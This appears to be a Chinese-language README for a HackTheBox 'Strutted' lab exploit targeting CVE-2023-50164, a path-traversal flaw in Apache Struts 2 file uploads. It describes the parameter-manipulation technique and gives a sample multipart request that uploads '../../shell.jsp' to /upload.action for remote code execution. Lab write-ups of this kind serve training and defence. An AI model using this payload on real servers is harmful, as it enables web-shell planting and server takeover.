此 exploit 专为 HackTheBox 的 Strutted 实验室开发,旨在利用 Apache Struts 2 中的 CVE-2023-50164 漏洞。该缺陷通过文件上传参数处理中的漏洞实现 路径遍历。本漏洞利用程序旨在演示攻击者如何上传 恶意文件 并实现 远程代码执行 (RCE)。
此 exploit 仅用于 HackTheBox 受控环境中的教育目的,不得在未经明确许可的情况下用于真实系统。未经同意利用漏洞是非法且不道德的。
该漏洞利用程序的目标是演示 Apache Struts 2 中的缺陷(特别是文件上传端点)如何被利用来实现:
CVE-2023-50164 漏洞与文件上传参数的不正确处理有关,允许攻击者操纵上传的文件名以实现 路径遍历。
HTTP 参数操纵:漏洞利用程序修改 HTTP 参数以包含目录遍历字符 (../),从而允许将恶意文件上传到未授权文件夹。
发送恶意文件:漏洞利用程序通过 POST 方法向 /upload.action 端点发送恶意文件,利用 HTTP 参数的 大小写敏感性 缺陷。
远程代码执行:攻击者可插入恶意代码,该代码在文件上传后将在服务器上执行。
以下是一个可用于利用该漏洞的 HTTP 请求示例:
POST /upload.action HTTP/1.1
Host: vulnerable-server.com
Content-Type: multipart/form-data; boundary=------------------------abcdef
--------------------------abcdef
Content-Disposition: form-data; name="Upload"; filename="img.png"
Content-Type: application/octet-stream
PNG
--------------------------abcdef
Content-Disposition: form-data;
Content-Type: application/octet-stream
../../shell.jsp
--------------------------abcdef--